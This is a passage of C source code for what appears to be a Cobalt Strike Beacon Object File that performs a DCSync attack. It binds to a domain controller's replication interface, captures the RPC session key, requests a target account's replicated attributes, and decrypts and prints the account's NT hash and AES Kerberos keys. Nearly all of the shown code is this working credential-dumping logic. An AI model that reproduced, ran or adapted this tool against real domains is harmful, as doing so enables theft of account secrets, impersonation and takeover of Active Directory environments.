    if (hKey) ADVAPI32$CryptDestroyKey(hKey);
    if (hProv) ADVAPI32$CryptReleaseContext(hProv, 0);
    
    return success;
}

BOOL DecryptRC4(const BYTE* encData, DWORD encLen, const BYTE* rid, BYTE* output) {
    HCRYPTPROV hProv = 0;
    HCRYPTHASH hHash = 0;
    HCRYPTKEY hKey = 0;
    BOOL success = FALSE;
    
    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        return FALSE;
    }
    
    if (!ADVAPI32$CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }
    
    if (!ADVAPI32$CryptHashData(hHash, rid, 4, 0)) {
        goto cleanup;
    }
    
    if (!ADVAPI32$CryptDeriveKey(hProv, CALG_RC4, hHash, 0, &hKey)) {
        goto cleanup;
    }
    
    MSVCRT$memcpy(output, encData, encLen);
    
    DWORD dataLen = encLen;
    if (ADVAPI32$CryptDecrypt(hKey, 0, TRUE, 0, output, &dataLen)) {
        success = TRUE;
    }
    
cleanup:
    if (hKey) ADVAPI32$CryptDestroyKey(hKey);
    if (hHash) ADVAPI32$CryptDestroyHash(hHash);
    if (hProv) ADVAPI32$CryptReleaseContext(hProv, 0);
    
    return success;
}

BOOL DecryptDESWithRid(const BYTE* encData, DWORD rid, BYTE* output) {
    return encData && output && ADVAPI32$SystemFunction025(encData, &rid, output) == 0;
}

DWORD HexToBinary(const BYTE* hexData, DWORD hexLen, BYTE* binaryOut) {
    if (!hexData || !binaryOut || hexLen < 2) return 0;
    
    DWORD binaryLen = 0;
    for (DWORD i = 0; i + 1 < hexLen; i += 2) {
        BYTE high = hexData[i];
        BYTE low = hexData[i + 1];
        
        // Convert ASCII hex char to nibble
        BYTE highNibble, lowNibble;
        
        if (high >= '0' && high <= '9') highNibble = high - '0';
        else if (high >= 'a' && high <= 'f') highNibble = high - 'a' + 10;
        else if (high >= 'A' && high <= 'F') highNibble = high - 'A' + 10;
        else break; // Invalid hex char
        
        if (low >= '0' && low <= '9') lowNibble = low - '0';
        else if (low >= 'a' && low <= 'f') lowNibble = low - 'a' + 10;
        else if (low >= 'A' && low <= 'F') lowNibble = low - 'A' + 10;
        else break; // Invalid hex char
        
        binaryOut[binaryLen++] = (highNibble << 4) | lowNibble;
    }
    
    return binaryLen;
}

// Parse Kerberos keys from supplementalCredentials
BOOL ParseKerberosKeys(const BYTE* propertyData, DWORD propertyLen, const char* samAccountName, const char* dcHostname, DWORD accountType, char* aes256Out, char* aes128Out) {
    if (!propertyData || !propertyLen || propertyLen < 32 || !samAccountName) return FALSE;
    
    // Skip 4-byte version prefix if present (00 00 00 01/02/03)
    const BYTE* structStart = propertyData;
    if (propertyData[0] == 0 && propertyData[1] == 0 && propertyData[2] == 0 && 
        propertyData[3] >= 1 && propertyData[3] <= 3) {
        structStart += 4;
    }
    
    // Read structure revision (big-endian USHORT at offset +0)
    USHORT revision = *(USHORT*)(structStart + 0);
    revision = ((revision & 0xFF) << 8) | ((revision >> 8) & 0xFF);
    BOOL isRevision0 = (revision == 0);
    
    // Read credential count (position varies by revision, big-endian)
    USHORT credCount = *(USHORT*)(structStart + (isRevision0 ? 2 : 4));
    credCount = ((credCount & 0xFF) << 8) | ((credCount >> 8) & 0xFF);
    if (credCount == 0 || credCount > 100) credCount = 3;
    
    // Read salt length (position varies by revision, big-endian)
    USHORT saltLen = *(USHORT*)(structStart + (isRevision0 ? 6 : 12));
    saltLen = ((saltLen & 0xFF) << 8) | ((saltLen >> 8) & 0xFF);
    if (saltLen == 0 || saltLen > 500) return FALSE;
    
    // Build search string to locate salt end based on account type
    // Trust accounts: uppercase domain FQDN + "krbtgt" + samAccountName (without $)
    // Computer account: uppercase FQDN + "host" + lowercase machine FQDN
    // User accounts: username as-is
    char searchName[256];
    DWORD searchLen = 0;
    DWORD nameLen = 0;
    while (samAccountName[nameLen] != '\0' && nameLen < 128) nameLen++;
    
    if (accountType == SAM_TRUST_ACCOUNT) {
        const char* domain = NULL;
        if (dcHostname) {
            for (DWORD i = 0; dcHostname[i] != '\0'; i++) {
                if (dcHostname[i] == '.') {
                    domain = &dcHostname[i + 1];
                    break;
                }
            }
        }
        if (domain && domain[0] != '\0') {
            // Add uppercase domain
            for (DWORD i = 0; domain[i] != '\0' && searchLen < 230; i++) {
                searchName[searchLen++] = domain[i];
            }
            // Append "krbtgt"
            if (searchLen + 6 < 255) {
                searchName[searchLen++] = 'k';
                searchName[searchLen++] = 'r';
                searchName[searchLen++] = 'b';
                searchName[searchLen++] = 't';
                searchName[searchLen++] = 'g';
                searchName[searchLen++] = 't';
            }
            // Append samAccountName (without trailing $)
            DWORD trustNameLen = nameLen;
            if (trustNameLen > 0 && samAccountName[trustNameLen - 1] == '$') trustNameLen--;
            for (DWORD i = 0; i < trustNameLen && searchLen < 255; i++) {
                searchName[searchLen++] = samAccountName[i];
            }
        }
    } else if (accountType == SAM_MACHINE_ACCOUNT) {
        const char* domain = NULL;
        if (dcHostname) {
            for (DWORD i = 0; dcHostname[i] != '\0'; i++) {
                if (dcHostname[i] == '.') {
                    domain = &dcHostname[i + 1];
                    break;
                }
            }
        }
        
        if (domain && domain[0] != '\0') {
            // Add uppercase domain FQDN
            for (DWORD i = 0; domain[i] != '\0' && searchLen < 200; i++) {
                searchName[searchLen++] = domain[i];
            }
        }
        
        // Append "host"
        if (searchLen + 4 < 255) {
            searchName[searchLen++] = 'h';
            searchName[searchLen++] = 'o';
            searchName[searchLen++] = 's';
            searchName[searchLen++] = 't';
        }
        
        // Add lowercase computer name (without trailing $)
        DWORD compNameLen = nameLen;
        if (nameLen > 0 && samAccountName[nameLen - 1] == '$') compNameLen--;
        
        for (DWORD i = 0; i < compNameLen && searchLen < 254; i++) {
            searchName[searchLen++] = samAccountName[i];
        }
        
        if (domain && domain[0] != '\0') {
            searchName[searchLen++] = '.';
            for (DWORD i = 0; domain[i] != '\0' && searchLen < 255; i++) {
                searchName[searchLen++] = domain[i];
            }
        }
    } else {
        // User account (SAM_USER_OBJECT): uppercase FQDN + samAccountName
        /*
        // This is optional, causes issues with Administrator account. disabled for now
        const char* domain = NULL;
        if (dcHostname) {
            for (DWORD i = 0; dcHostname[i] != '\0'; i++) {
                if (dcHostname[i] == '.') {
                    domain = &dcHostname[i + 1];
                    break;
                }
            }
        }
        
        if (domain && domain[0] != '\0') {
            // Add uppercase domain FQDN
            for (DWORD i = 0; domain[i] != '\0' && searchLen < 200; i++) {
                char c = domain[i];
                if (c >= 'a' && c <= 'z') c -= ('a' - 'A');  // uppercase
                searchName[searchLen++] = c;
            }
        }
        */
        
        // Append samAccountName as-is
        for (DWORD i = 0; i < nameLen && searchLen < 255; i++) {
            searchName[searchLen++] = samAccountName[i];
        }
    }
    
    // Convert to UTF-16LE for searching
    BYTE searchUTF16[512];
    for (DWORD i = 0; i < searchLen; i++) {
        searchUTF16[i * 2] = searchName[i];
        searchUTF16[i * 2 + 1] = 0x00;
    }
    DWORD searchUTF16Len = searchLen * 2;
    
    // Find salt end by locating the search string (case-insensitive)
    DWORD descriptorStart = isRevision0 ? 32 : 28;
    DWORD matchOffset = 0xFFFFFFFF;
    for (DWORD i = descriptorStart + 20; i + searchUTF16Len <= propertyLen; i++) {
        BOOL match = TRUE;
        for (DWORD j = 0; j < searchUTF16Len; j++) {
            BYTE propertyByte = propertyData[i + j];
            BYTE searchByte = searchUTF16[j];
            
            // Case-insensitive comparison for ASCII letters in UTF-16LE (even positions only)
            if (j % 2 == 0) {
                // Convert to uppercase for comparison
                if (propertyByte >= 'a' && propertyByte <= 'z') propertyByte -= ('a' - 'A');
                if (searchByte >= 'a' && searchByte <= 'z') searchByte -= ('a' - 'A');
            }
            
            if (propertyByte != searchByte) {
                match = FALSE;
                break;
            }
        }
        if (match) {
            matchOffset = i;
            break;
        }
    }
    
    if (matchOffset == 0xFFFFFFFF) return FALSE;
    
    // Calculate salt boundaries
    DWORD saltEnd = matchOffset + searchUTF16Len;
    
    // Need at least 48 bytes for AES256 (32) + AES128 (16)
    if (propertyLen - saltEnd < 48) {
        return FALSE;
    }
    
    // Keys are stored after salt as raw binary data
    DWORD scanStart = saltEnd;
    
    for (DWORD tryOffset = scanStart; tryOffset + 48 <= propertyLen; tryOffset++) {
        // Check if this looks like binary key data vs UTF-16LE text
        DWORD zeroCount = 0;
        DWORD evenZeros = 0;   // Zeros at even positions (0, 2, 4...)
        DWORD oddZeros = 0;    // Zeros at odd positions (1, 3, 5...)
        DWORD highBitCount = 0; // Bytes >= 0x80
        
        for (DWORD i = 0; i < 48; i++) {
            BYTE b = propertyData[tryOffset + i];
            if (b == 0x00) {
                zeroCount++;
                if (i % 2 == 0) evenZeros++;
                else oddZeros++;
            }
            if (b >= 0x80) highBitCount++;
        }
        
        // Skip if this looks like UTF-16LE text
        // User account keys may have more zeros than machine/trust keys
        if (oddZeros > 5) continue;  // Too many odd zeros = UTF-16LE pattern  
        if (zeroCount > 30) continue;  // More than ~60% zeros = likely padding
        if (highBitCount < 5) continue;  // Need some high-bit bytes for randomness
        
        // This looks like binary data - validate entropy
        char tempAES256[65] = {0};
        char tempAES128[33] = {0};
        BytesToHex(propertyData + tryOffset, 32, tempAES256);
        BytesToHex(propertyData + tryOffset + 32, 16, tempAES128);
        
        // Check for good entropy (not all same characters)
        DWORD sameCount256 = 0, sameCount128 = 0;
        for (int i = 1; i < 64; i++) {
            if (tempAES256[i] == tempAES256[i-1]) sameCount256++;
        }
        for (int i = 1; i < 32; i++) {
            if (tempAES128[i] == tempAES128[i-1]) sameCount128++;
        }
        if (sameCount256 > 50 || sameCount128 > 25) continue;
        
        // Found valid keys
        if (aes256Out) MSVCRT$memcpy(aes256Out, tempAES256, 65);
        if (aes128Out) MSVCRT$memcpy(aes128Out, tempAES128, 33);
        return TRUE;
    }
    
    return FALSE;
}

void InitDRSRequest(DRS_MSG_GETCHGREQ* request, const GUID* dcGuid, DSNAME* targetDsname) {
    if (!request) return;
    
    MSVCRT$memset(request, 0, sizeof(DRS_MSG_GETCHGREQ));
    
    if (dcGuid) {
        MSVCRT$memcpy(&request->V8.uuidDsaObjDest, dcGuid, sizeof(GUID));
    }
    
    request->V8.pNC = targetDsname;
    MSVCRT$memset(&request->V8.uuidInvocIdSrc, 0, sizeof(UUID));
    MSVCRT$memset(&request->V8.usnvecFrom, 0, sizeof(USN_VECTOR));
    request->V8.pUpToDateVecDest = NULL;
    request->V8.ulFlags = DRS_INIT_SYNC | DRS_WRIT_REP | DRS_NEVER_SYNCED | DRS_FULL_SYNC_NOW | DRS_SYNC_URGENT;
    // Maybe DRS_SPECIAL_SECRET_PROCESSING?
    request->V8.cMaxObjects = 1;
    request->V8.cMaxBytes = 0xA00000;
    request->V8.ulExtendedOp = EXOP_REPL_OBJ;
    MSVCRT$memset(&request->V8.liFsmoInfo, 0, sizeof(ULARGE_INTEGER));
    request->V8.pPartialAttrSet = NULL;
    request->V8.pPartialAttrSetEx = NULL;
    request->V8.PrefixTableDest.PrefixCount = 0;
    request->V8.PrefixTableDest.pPrefixEntry = NULL;
}

DSNAME* BuildDSName(const char* dn, const GUID* guid) {
    if (!dn) return NULL;
    
    size_t dnLen = MSVCRT$strlen(dn);
    if (dnLen > 4096) return NULL; // Sanity check
    wchar_t* wDn = CharToWChar(dn);
    if (!wDn) return NULL;
    
    size_t wDnLen = 0;
    while (wDn[wDnLen] != 0) wDnLen++;
    
    // Calculate structure size properly using FIELD_OFFSET
    // DSNAME has: structLen, SidLen, Guid, Sid (28 bytes), NameLen, StringName[1]
    // We need: base structure + space for (wDnLen) wide chars (StringName[1] already counts for 1)
    // NOTE: structLen should include the null terminator
    DWORD structLen = (DWORD)(sizeof(DSNAME) - sizeof(WCHAR) + ((wDnLen + 1) * sizeof(WCHAR)));
    
    DSNAME* dsname = (DSNAME*)MSVCRT$malloc(structLen);
    if (!dsname) {
        MSVCRT$free(wDn);
        return NULL;
    }
    
    MSVCRT$memset(dsname, 0, structLen);
    dsname->structLen = structLen;
    dsname->NameLen = (DWORD)wDnLen;  // Length WITHOUT null terminator
    dsname->SidLen = 0;  // Not providing SID
    
    // Copy GUID if provided
    if (guid) {
        MSVCRT$memcpy(&dsname->Guid, guid, sizeof(GUID));
    } else {
        MSVCRT$memset(&dsname->Guid, 0, sizeof(GUID));
    }
    
    // Copy the wide string DN (including null terminator)
    for (size_t i = 0; i <= wDnLen; i++) {  // <= to include null terminator
        dsname->StringName[i] = wDn[i];
    }
    
    MSVCRT$free(wDn);
    return dsname;
}

RPC_BINDING_HANDLE CreateDRSBinding(const char* dcHostname) {
    RPC_BINDING_HANDLE binding = NULL;
    unsigned char* stringBinding = NULL;
    RPC_STATUS status;
    
    // Build RPC string binding for DRSUAPI
    // Format: ncacn_ip_tcp:hostname[endpoint]
    status = RPCRT4$RpcStringBindingComposeA(
        NULL,                           // Object UUID
        (unsigned char*)"ncacn_ip_tcp", // Protocol sequence
        (unsigned char*)dcHostname,     // Network address
        NULL,                           // Use dynamic endpoint
        NULL,                           // No options
        &stringBinding
    );
    
    if (status != RPC_S_OK) {
        ERROR_PRINT( "[-] Failed to compose RPC string binding: 0x%x", status);
        return NULL;
    }
    
    // Create binding handle
    status = RPCRT4$RpcBindingFromStringBindingA(stringBinding, &binding);
    RPCRT4$RpcStringFreeA(&stringBinding);
    
    if (status != RPC_S_OK) {
        ERROR_PRINT( "[-] Failed to create RPC binding: 0x%x", status);
        return NULL;
    }
    
    // Set authentication info (use Kerberos/NTLM via NEGOTIATE)
    // Use NULL for SPN to let RPC determine the correct service principal
    status = RPCRT4$RpcBindingSetAuthInfoA(
        binding,
        NULL,                           // Let RPC determine SPN
        RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
        RPC_C_AUTHN_GSS_NEGOTIATE,
        NULL,                           // Use current credentials
        RPC_C_AUTHZ_NAME
    );
    
    if (status != RPC_S_OK) {
        ERROR_PRINT( "[-] Failed to set RPC auth info: 0x%x", status);
        RPCRT4$RpcBindingFree(&binding);
        return NULL;
    }
    
    // Register security callback to capture session key during authentication
    status = RPCRT4$RpcBindingSetOption(binding, RPC_C_OPT_SECURITY_CALLBACK, (ULONG_PTR)RpcSecurityCallback);
    if (status != RPC_S_OK) {
        ERROR_PRINT( "[-] Failed to set security callback: 0x%x", status);
        RPCRT4$RpcBindingFree(&binding);
        return NULL;
    }

    return binding;
}

DRS_HANDLE BindToDRS(RPC_BINDING_HANDLE rpcBinding) {
    DRS_HANDLE drsHandle = NULL;
    DRS_EXTENSIONS_INT* extClient = NULL;
    DRS_EXTENSIONS_INT* extServer = NULL;
    UUID clientDsaUuid;
    ULONG result;
    
    // Generate a random client DSA UUID
    RPCRT4$UuidCreate(&clientDsaUuid);
    
    // Create DRS_EXTENSIONS_INT structure
    extClient = (DRS_EXTENSIONS_INT*)MSVCRT$malloc(sizeof(DRS_EXTENSIONS_INT));
    if (!extClient) {
        return NULL;
    }
    MSVCRT$memset(extClient, 0, sizeof(DRS_EXTENSIONS_INT));
    
    extClient->cb = sizeof(DRS_EXTENSIONS_INT);
    extClient->dwFlags = 0x1FFFFFFF;  // All modern capabilities
    extClient->Pid = 0;
    extClient->dwReplEpoch = 0;
    
    // Call IDL_DRSBind using the Microsoft RPC stub
    result = IDL_DRSBind(
        rpcBinding,
        &clientDsaUuid,
        extClient,
        &extServer,
        &drsHandle
    );
    
    MSVCRT$free(extClient);
    MSVCRT$free(extServer);
    
    if (result != 0) {
        ERROR_PRINT( "[-] DRSBind failed: 0x%x", result);
        return NULL;
    }

    return drsHandle;
}

DWORD GetRIDFromSID(const BYTE* sid, DWORD sidLen) {
    if (!sid || sidLen < 12) return 0;
    
    // SID structure: Revision (1) + SubAuthCount (1) + Authority (6) + SubAuths (4 * count)
    // RID is the last SubAuth value
    BYTE subAuthCount = sid[1];
    if (sidLen < (8 + (subAuthCount * 4))) return 0;
    
    DWORD offset = 8 + ((subAuthCount - 1) * 4);
    DWORD rid = *(DWORD*)(sid + offset);
    
    return rid;
}

void ProcessCredentials(REPLENTINFLIST* objects, const char* samAccountName, const char* distinguishedName, const char* dcHostname, const BYTE* sessionKey, DWORD sessionKeyLen, int onlyNT) {
    if (!objects) return;
    
    char ntHash[33] = {0};
    char lmHash[33] = {0};
    char aes256Key[65] = {0};
    char aes128Key[33] = {0};
    BOOL foundNT = FALSE;
    BOOL foundLM = FALSE;
    BOOL foundAES256 = FALSE;
    BOOL foundAES128 = FALSE;
    DWORD userRID = 0;
    DWORD accountType = SAM_USER_OBJECT;  // Default to user account
    
    // Iterate through returned objects
    REPLENTINFLIST* current = objects;
    while (current) {
        ENTINF* entinf = &current->Entinf;
        ATTRBLOCK* attrBlock = &entinf->AttrBlock;
        
        // FIRST PASS: Extract RID and account type (needed for decryption and salt construction)
        for (ULONG i = 0; i < attrBlock->attrCount; i++) {
            ATTR* attr = &attrBlock->pAttr[i];
            ATTRTYP attrType = attr->attrTyp;
            
            if (attrType == ATT_OBJECT_SID && attr->AttrVal.valCount > 0) {
                ATTRVAL* val = &attr->AttrVal.pAVal[0];
                userRID = GetRIDFromSID(val->pVal, val->valLen);
            }
            else if (attrType == ATT_SAM_ACCOUNT_TYPE && attr->AttrVal.valCount > 0) {
                ATTRVAL* val = &attr->AttrVal.pAVal[0];
                if (val->valLen == 4) {
                    accountType = *(DWORD*)(val->pVal);
                }
            }
        }
        
        // SECOND PASS: Process all attributes with correct RID
        for (ULONG i = 0; i < attrBlock->attrCount; i++) {
            ATTR* attr = &attrBlock->pAttr[i];
            ATTRTYP attrType = attr->attrTyp;
            
            // NT hash (unicodePwd) - ATTRTYP should be 0x9005A
            if (attrType == ATT_UNICODE_PWD && attr->AttrVal.valCount > 0) {
                ATTRVAL* val = &attr->AttrVal.pAVal[0];
                
                // Modern AD uses encrypted blob format with structure:
                // For 36 bytes: [4 byte header] + [16 byte salt] + [16 byte encrypted hash]
                // For 20 bytes: [4 byte header] + [16 byte encrypted hash]  
                // For 16 bytes: [16 byte encrypted hash] (simple RC4)
                
                if (val->valLen == 16) {
                    BYTE decrypted[16];
                    BYTE ridBytes[4];
                    *(DWORD*)ridBytes = userRID;
                    
                    if (DecryptRC4(val->pVal, 16, ridBytes, decrypted)) {
                        BytesToHex(decrypted, 16, ntHash);
                        foundNT = TRUE;
                    }
                } else if (val->valLen == 20) {
                    BYTE decrypted[16];
                    BYTE ridBytes[4];
                    *(DWORD*)ridBytes = userRID;
                    
                    if (DecryptRC4(val->pVal + 4, 16, ridBytes, decrypted)) {
                        BytesToHex(decrypted, 16, ntHash);
                        foundNT = TRUE;
                    }
                } else if (val->valLen == 36 || val->valLen == 40) {
                    BYTE decrypted[32];
                    BOOL decryptSuccess = FALSE;
                    BYTE ridBytes[4];
                    *(DWORD*)ridBytes = userRID;
                    
                    if (sessionKey && sessionKeyLen > 0) {
                        DWORD outputLen = 0;
                        BYTE sessionDecrypted[32];
                        if (DecryptWithSessionKey(val->pVal, val->valLen, sessionKey, sessionKeyLen, sessionDecrypted, &outputLen)) {
                            if (outputLen >= 16) {
                                BYTE ridDecrypted[16];
                                if (DecryptDESWithRid(sessionDecrypted, userRID, ridDecrypted)) {
                                    MSVCRT$memcpy(decrypted, ridDecrypted, 16);
                                    BytesToHex(decrypted, 16, ntHash);
                                    foundNT = TRUE;
                                    decryptSuccess = TRUE;
                                }
                            }
                        }
                    }
                    
                    if (!decryptSuccess) {
                        BYTE ridDecrypted[16];
                        if (DecryptRC4(val->pVal + 20, 16, ridBytes, ridDecrypted) && ridDecrypted[0] != 0 && ridDecrypted[0] != 0xFF) {
                            BytesToHex(ridDecrypted, 16, ntHash);
                            foundNT = TRUE;
                            decryptSuccess = TRUE;
                        }
                    }
                    
                    if (!decryptSuccess) {
                        BYTE ridDecrypted[16];
                        if (DecryptRC4(val->pVal + 4, 16, ridBytes, ridDecrypted) && ridDecrypted[0] != 0 && ridDecrypted[0] != 0xFF) {
                            BytesToHex(ridDecrypted, 16, ntHash);
                            foundNT = TRUE;
                            decryptSuccess = TRUE;
                        }
                    }
                    
                    if (!decryptSuccess && DecryptRC4(val->pVal, 16, ridBytes, decrypted) && decrypted[0] != 0 && decrypted[0] != 0xFF) {
                        BytesToHex(decrypted, 16, ntHash);
                        foundNT = TRUE;
                        decryptSuccess = TRUE;
                    }
                }
            }
            
            if (attrType == 0x9007D && attr->AttrVal.valCount > 0) {
                ATTRVAL* val = &attr->AttrVal.pAVal[0];
                if (val->valLen > 65536) continue; // Sanity check
                BYTE* decrypted = (BYTE*)MSVCRT$malloc(val->valLen);
                if (!decrypted) continue;
                {
                    BYTE ridBytes[4];
                    *(DWORD*)ridBytes = userRID;
                    
                    BOOL decryptSuccess = FALSE;
                    
                    if (sessionKey && sessionKeyLen > 0 && val->valLen > 108) {
                        DWORD sessionDecryptedLen = 0;
                        BYTE* sessionDecrypted = (BYTE*)MSVCRT$malloc(val->valLen);
                        if (!sessionDecrypted) {
                            MSVCRT$free(decrypted);
                            continue;
                        }
                        
                        if (DecryptWithSessionKey(val->pVal, val->valLen, sessionKey, sessionKeyLen, sessionDecrypted, &sessionDecryptedLen)) {
                            MSVCRT$memcpy(decrypted, sessionDecrypted, sessionDecryptedLen);
                            decryptSuccess = TRUE;
                        }
                        
                        if (sessionDecrypted) MSVCRT$free(sessionDecrypted);
                    }
                    
                    if (!decryptSuccess) {
                        if (DecryptRC4(val->pVal, val->valLen, ridBytes, decrypted)) {
                            decryptSuccess = TRUE;
                        }
                    }
                    
                    if (decryptSuccess) {
                        // USER_PROPERTIES structure:
                        // typedef struct _USER_PROPERTIES {
                        //   DWORD Reserved1;         // offset 0 (4 bytes) - should be 0
                        //   DWORD Length;            // offset 4 (4 bytes) - length of UserProperties data
                        //   WORD Reserved2;          // offset 8 (2 bytes)
                        //   WORD Reserved3;          // offset 10 (2 bytes)
                        //   BYTE Reserved4[96];      // offset 12-107 (96 bytes)
                        //   BYTE UserProperties[1];  // offset 108+
                        // } USER_PROPERTIES;
                        
                        if (val->valLen < 108) {
                            ERROR_PRINT( "[!] Buffer too small for USER_PROPERTIES");
                            MSVCRT$free(decrypted);
                            continue;
                        }
                        
                        DWORD* pLength = (DWORD*)(decrypted + 4);
                        BYTE* propertyData = decrypted + 108;
                        DWORD propertyLen = val->valLen - 108;
                        
                        if (*pLength > 0 && *pLength <= (val->valLen - 108)) {
                            propertyLen = *pLength;
                        }
                        
                        for (DWORD i = 0; i < propertyLen - 40; i++) {
                            if (propertyData[i] == 'P' && propertyData[i+1] == 0x00 &&
                                propertyData[i+2] == 'r' && propertyData[i+3] == 0x00 &&
                                propertyData[i+4] == 'i' && propertyData[i+5] == 0x00 &&
                                propertyData[i+6] == 'm' && propertyData[i+7] == 0x00) {
                                
                                char packageName[128] = {0};
                                int nameIdx = 0;
                                for (int j = 0; j < 200 && (i + j) < propertyLen && nameIdx < 127; j += 2) {
                                    BYTE ch = propertyData[i + j];
                                    BYTE null = propertyData[i + j + 1];
                                    
                                    if (ch == 0 && null == 0) break;
                                    if (null != 0) break;
                                    if (ch < 0x20 || ch > 0x7E) break;
                                    
                                    packageName[nameIdx++] = ch;
                                }
                                packageName[nameIdx] = '\0';
                                
                                if (nameIdx > 8 && MSVCRT$strstr(packageName, "Kerberos")) {
                                    DWORD dataStart = i + (nameIdx * 2) + 2;
                                    if (dataStart >= propertyLen) break;
                                    DWORD remainingLen = propertyLen - dataStart;
                                    if (remainingLen > 32768) break; // Sanity check
                                    
                                    BYTE* decodedValue = (BYTE*)MSVCRT$malloc(remainingLen / 2 + 1);
                                    if (!decodedValue) break;
                                    {
                                        DWORD decodedLen = HexToBinary(propertyData + dataStart, remainingLen, decodedValue);
                                        
                                        if (decodedLen > 0) {
                                            if (ParseKerberosKeys(decodedValue, decodedLen, samAccountName, dcHostname, accountType, aes256Key, aes128Key)) {
                                                if (aes256Key[0] != '\0') foundAES256 = TRUE;
                                                if (aes128Key[0] != '\0') foundAES128 = TRUE;
                                            }
                                        }
                                        
                                        MSVCRT$free(decodedValue);
                                    }
                                }
                            }
                        }
                    }
                    
                    MSVCRT$free(decrypted);
                }
            }
        }
        
        current = current->pNextEntInf;
    }
    
    // Extract domain from DN (DC=child,DC=contoso,DC=local -> child.contoso.local)
    char domainName[256] = {0};
    DWORD domainLen = 0;
    if (distinguishedName) {
        const char* p = distinguishedName;
        while (*p) {
            // Find "DC=" or "dc="
            if ((p[0] == 'D' || p[0] == 'd') && (p[1] == 'C' || p[1] == 'c') && p[2] == '=') {
                p += 3; // Skip "DC="
                // Add separator if not first component
                if (domainLen > 0 && domainLen < 255) {
                    domainName[domainLen++] = '.';
                }
                // Copy until comma or end
                while (*p && *p != ',' && domainLen < 255) {
                    domainName[domainLen++] = *p++;
                }
            } else {
                p++;
            }
        }
        domainName[domainLen] = '\0';
    }
    
    if (accountType == SAM_USER_OBJECT) {
        if (domainLen > 0)
            OUTPUT_PRINT("\n[*] User: %s\\%s", domainName, samAccountName);
        else
            OUTPUT_PRINT("\n[*] User: %s", samAccountName);
    } else if (accountType == SAM_MACHINE_ACCOUNT) {
        if (domainLen > 0)
            OUTPUT_PRINT("\n[*] Computer: %s\\%s", domainName, samAccountName);
        else
            OUTPUT_PRINT("\n[*] Computer: %s", samAccountName);
    } else if (accountType == SAM_TRUST_ACCOUNT) {
        if (domainLen > 0)
            OUTPUT_PRINT("\n[*] Trust account: %s\\%s", domainName, samAccountName);
        else
            OUTPUT_PRINT("\n[*] Trust account: %s", samAccountName);
    } else {
        if (domainLen > 0)
            OUTPUT_PRINT("\n[*] Object: %s\\%s", domainName, samAccountName);
        else
            OUTPUT_PRINT("\n[*] Object: %s", samAccountName);
    }

    // OUTPUT_PRINT("  %s", samAccountName);
    if (foundNT) OUTPUT_PRINT("  nt:\t%s", ntHash);
    if (!onlyNT) {
        if (foundAES256) OUTPUT_PRINT("  aes256:\t%s", aes256Key);
        if (foundAES128) OUTPUT_PRINT("  aes128:\t%s", aes128Key);
    }
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments
    char* target = BeaconDataExtract(&parser, NULL);        // Username or DN
    int isDN = BeaconDataInt(&parser);                      // 0 = username, 1 = DN
    char* ouPath = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    int onlyNT = BeaconDataInt(&parser);
    
    // Variables for cleanup
    RPC_BINDING_HANDLE rpcBinding = NULL;
    DRS_HANDLE drsHandle = NULL;
    DSNAME* targetDsname = NULL;
    PARTIAL_ATTR_VECTOR_V1_EXT* pPartialAttrSet = NULL;
    PrefixTableEntry* prefixEntries = NULL;
    unsigned char* oidCopies[10];  // Array to hold OID pointers for prefix table
    DWORD oidCopyCount = 0;  // Track how many OIDs were allocated
    char* dcHostname = NULL;
    LDAP* ld = NULL;
    DC_CONTEXT* dcContext = NULL;
    USER_LDAP_INFO* userInfo = NULL;
    
    // Initialize OID array
    MSVCRT$memset(oidCopies, 0, sizeof(oidCopies));
    
    // Reset session key capture for this run
    g_SessionKeyCapturing = 0;
    g_SessionKeyCopyLen = 0;
    MSVCRT$memset(g_SessionKeyCopy, 0, sizeof(g_SessionKeyCopy));
    
    if (!target || MSVCRT$strlen(target) == 0) {
        ERROR_PRINT( "[-] No target specified");
        return;
    }
    
    // Initialize LDAP connection
    ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        ERROR_PRINT( "[-] Failed to initialize LDAP");
        return;
    }
    
    // Get DC context (defaultNamingContext + DC GUID)
    dcContext = GetDCContext(ld, dcHostname);
    if (!dcContext) {
        ERROR_PRINT( "[-] Failed to get DC context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }
    
    // Get user info (DN, sAMAccountName, GUID)
    char* searchBase = (ouPath && MSVCRT$strlen(ouPath) > 0) ? ouPath : dcContext->defaultNamingContext;
    userInfo = GetUserInfo(ld, target, searchBase, isDN);
    
    if (!userInfo) {
        ERROR_PRINT( "[-] Could not find user: %s", target);
        FreeDCContext(dcContext);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Done with LDAP
    CleanupLDAP(ld);    // Create RPC binding to DRSUAPI
    rpcBinding = CreateDRSBinding(dcHostname);
    if (!rpcBinding) {
        ERROR_PRINT( "[-] Failed to create DRSUAPI binding");
        FreeUserInfo(userInfo);
        FreeDCContext(dcContext);
        if (dcHostname) MSVCRT$free(dcHostname);
        return;
    }
    
    // Bind to DRS interface
    drsHandle = BindToDRS(rpcBinding);
    if (!drsHandle) {
        RPCRT4$RpcBindingFree(&rpcBinding);
        FreeUserInfo(userInfo);
        FreeDCContext(dcContext);
        if (dcHostname) MSVCRT$free(dcHostname);
        return;
    }
    
    KERNEL32$Sleep(100); // Small delay for drs response and session key syncing
    
    // Copy session key from callback's static buffer (if captured)
    BYTE* sessionKey = NULL;
    DWORD sessionKeyLen = 0;
    
    if (g_SessionKeyCopyLen > 0 && g_SessionKeyCopyLen <= 256) {
        sessionKey = (BYTE*)MSVCRT$malloc(g_SessionKeyCopyLen);
        if (sessionKey) {
            MSVCRT$memcpy(sessionKey, g_SessionKeyCopy, g_SessionKeyCopyLen);
            sessionKeyLen = g_SessionKeyCopyLen;
        }
    }
    
    // Build DSNAME for the target object with GUID
    targetDsname = BuildDSName(userInfo->distinguishedName, &userInfo->objectGuid);
    
    if (!targetDsname) {
        ERROR_PRINT( "[-] Failed to build DSNAME structure for target");
        goto cleanup;
    }
    
